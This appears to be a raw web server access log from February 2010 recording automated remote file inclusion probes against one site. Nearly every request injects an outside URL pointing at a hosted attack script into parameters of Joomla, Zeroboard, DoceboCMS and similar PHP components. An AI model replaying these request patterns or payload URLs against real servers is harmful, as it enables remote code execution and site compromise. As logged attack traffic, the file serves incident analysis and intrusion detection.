193.138.157.25 - - [19/Feb/2010:09:44:57 -0800] "GET /logs/access_100126.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [19/Feb/2010:09:48:32 -0800] "GET /zboard//skin/zero_vote/error.php?dir=http://www.rwies1406.de//sb/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
124.193.89.226 - - [19/Feb/2010:09:49:44 -0800] "GET /logs//oneadmin/newspublish/include.php?path[docroot]=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.193.89.226 - - [19/Feb/2010:09:49:44 -0800] "GET /logs/access_100202.log%20%20//oneadmin/newspublish/include.php?path[docroot]=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.193.89.226 - - [19/Feb/2010:09:49:44 -0800] "GET /oneadmin/newspublish/include.php?path[docroot]=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.193.89.226 - - [19/Feb/2010:09:50:02 -0800] "GET /logs//oneadmin/newspublish/include.php?path[docroot]=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.193.89.226 - - [19/Feb/2010:09:50:02 -0800] "GET /logs/access_100202.log%20%20//oneadmin/newspublish/include.php?path[docroot]=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.193.89.226 - - [19/Feb/2010:09:50:02 -0800] "GET /oneadmin/newspublish/include.php?path[docroot]=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [19/Feb/2010:09:50:45 -0800] "GET /components/com_rwcards//errors.php?error=http://www.rwies1406.de//sb/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:09:55:09 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:09:55:10 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:09:55:10 -0800] "GET /logs/access_100208.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.193.89.226 - - [19/Feb/2010:09:58:10 -0800] "GET /logs/access_100115.log%20%20//oneadmin/newspublish/include.php?path[docroot]=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [19/Feb/2010:10:00:15 -0800] "GET /logs/access_100127.log//components/com_rwcards//errors.php?error=http://www.rwies1406.de//sb/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
211.239.124.204 - - [19/Feb/2010:10:00:16 -0800] "GET /components/com_rwcards//errors.php?error=http://www.rwies1406.de//sb/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
211.239.124.204 - - [19/Feb/2010:10:00:17 -0800] "GET /logs//components/com_rwcards//errors.php?error=http://www.rwies1406.de//sb/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
189.14.103.146 - - [19/Feb/2010:10:01:29 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.puaga.com"
189.14.103.146 - - [19/Feb/2010:10:01:29 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.puaga.com"
189.14.103.146 - - [19/Feb/2010:10:01:29 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
189.14.103.146 - - [19/Feb/2010:10:01:29 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:01:39 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:01:39 -0800] "GET /logs/access_100111.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:01:40 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:10:01:40 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:10:01:40 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:10:01:40 -0800] "GET /logs/access_100208.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:02:09 -0800] "GET /logs/access_100111.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:02:09 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:02:10 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:02:19 -0800] "GET /logs/access_100114.log/errors.php?error=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:02:19 -0800] "GET /logs/errors.php?error=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:02:19 -0800] "GET /errors.php?error=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:10:02:20 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:10:02:20 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:10:02:20 -0800] "GET /logs/access_100208.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:02:23 -0800] "GET /logs/access_100119.log/errors.php?error=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:02:32 -0800] "GET /logs/access_100114.log/errors.php?error=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:02:32 -0800] "GET /logs/errors.php?error=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:02:32 -0800] "GET /errors.php?error=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:02:37 -0800] "GET /logs/access_100119.log/errors.php?error=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [19/Feb/2010:10:02:47 -0800] "GET /logs/access_100119.log//components/com_rwcards//errors.php?error=http://www.rwies1406.de//sb/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:02:56 -0800] "GET /logs/access_100122.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:03:00 -0800] "GET /logs/access_100114.log%20%20/errors.php?error=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:03:00 -0800] "GET /errors.php?error=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:03:00 -0800] "GET /logs/errors.php?error=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:03:23 -0800] "GET /logs/access_100122.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:03:53 -0800] "GET /logs/access_100114.log/errors.php?error=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:03:53 -0800] "GET /errors.php?error=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:03:53 -0800] "GET /logs/errors.php?error=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:03:58 -0800] "GET /errors.php?error=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:03:58 -0800] "GET /logs/access_100114.log%20%20/errors.php?error=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:03:58 -0800] "GET /logs/errors.php?error=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:04:05 -0800] "GET /logs/access_100209.log/errors.php?error=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:05:26 -0800] "GET /logs/access_100209.log/errors.php?error=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:05:26 -0800] "GET /logs/errors.php?error=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:05:26 -0800] "GET /errors.php?error=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:05:34 -0800] "GET /logs/access_100107.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:05:55 -0800] "GET /logs/access_100122.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [19/Feb/2010:10:06:33 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [19/Feb/2010:10:06:33 -0800] "GET /logs/access_100202.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [19/Feb/2010:10:06:33 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [19/Feb/2010:10:06:54 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [19/Feb/2010:10:06:54 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [19/Feb/2010:10:06:54 -0800] "GET /logs/access_100202.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [19/Feb/2010:10:07:06 -0800] "GET /logs/access_100121.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:07:20 -0800] "GET /logs/access_100111.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [19/Feb/2010:10:07:27 -0800] "GET /logs/access_100121.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:07:43 -0800] "GET /logs/access_100122.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:08:10 -0800] "GET /logs/access_100117.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:10:26 -0800] "GET /logs/access_100117.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [19/Feb/2010:10:13:25 -0800] "GET /logs/access_100202.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:10:18:51 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:18:59 -0800] "GET /logs/access_100119.log%20%20/errors.php?error=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.179.255.82 - - [19/Feb/2010:10:19:01 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.179.255.82 - - [19/Feb/2010:10:19:04 -0800] "GET /logs/access_100115.log%20%20/e404.php?DOCUMENT_ROOT=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.179.255.82 - - [19/Feb/2010:10:19:04 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:19:37 -0800] "GET /logs/access_100119.log%20%20/errors.php?error=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.0.61 - - [19/Feb/2010:10:19:57 -0800] "GET /logs/access_100116.log%20%20/lostpasswd.php?env[include_prefix]=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.0.61 - - [19/Feb/2010:10:19:57 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.0.61 - - [19/Feb/2010:10:19:57 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.179.255.82 - - [19/Feb/2010:10:20:26 -0800] "GET /logs/access_100121.log%20%20//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.179.255.82 - - [19/Feb/2010:10:20:26 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:20:44 -0800] "GET /logs//admin.wmtgallery.php?mosConfig_live_site=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:20:44 -0800] "GET /logs/access_100124.log//admin.wmtgallery.php?mosConfig_live_site=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:10:20:44 -0800] "GET /admin.wmtgallery.php?mosConfig_live_site=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.179.255.82 - - [19/Feb/2010:10:20:55 -0800] "GET /logs/access_100121.log%20%20//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.179.255.82 - - [19/Feb/2010:10:20:55 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.179.255.82 - - [19/Feb/2010:10:20:56 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.179.255.82 - - [19/Feb/2010:10:21:18 -0800] "GET /logs/access_100124.log%20%20//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.179.255.82 - - [19/Feb/2010:10:21:22 -0800] "GET /logs/access_100124.log%20%20//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.0.61 - - [19/Feb/2010:10:21:51 -0800] "GET /logs/access_100114.log%20%20/lostpasswd.php?env[include_prefix]=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.179.255.82 - - [19/Feb/2010:10:23:51 -0800] "GET /logs/access_100124.log%20%20/e404.php?DOCUMENT_ROOT=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:10:24:14 -0800] "GET /logs/access_100123.log%20%20//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:10:24:14 -0800] "GET /component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.179.255.82 - - [19/Feb/2010:10:24:16 -0800] "GET /logs/access_100116.log%20%20/e404.php?DOCUMENT_ROOT=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [19/Feb/2010:10:24:35 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [19/Feb/2010:10:24:35 -0800] "GET /logs/access_100121.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [19/Feb/2010:10:24:35 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:10:24:42 -0800] "GET /component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:10:24:42 -0800] "GET /logs//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:10:24:42 -0800] "GET /logs/access_100123.log//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:10:24:46 -0800] "GET /logs/access_100123.log//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:10:24:46 -0800] "GET /component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:10:24:46 -0800] "GET /logs//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:10:25:04 -0800] "GET /component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:10:25:05 -0800] "GET /logs//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:10:25:05 -0800] "GET /logs/access_100123.log%20%20//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.0.61 - - [19/Feb/2010:10:25:28 -0800] "GET /logs/access_100116.log/lostpasswd.php?env[include_prefix]=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.0.61 - - [19/Feb/2010:10:26:09 -0800] "GET /logs/access_100114.log/lostpasswd.php?env[include_prefix]=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:10:27:09 -0800] "GET /logs/access_100123.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
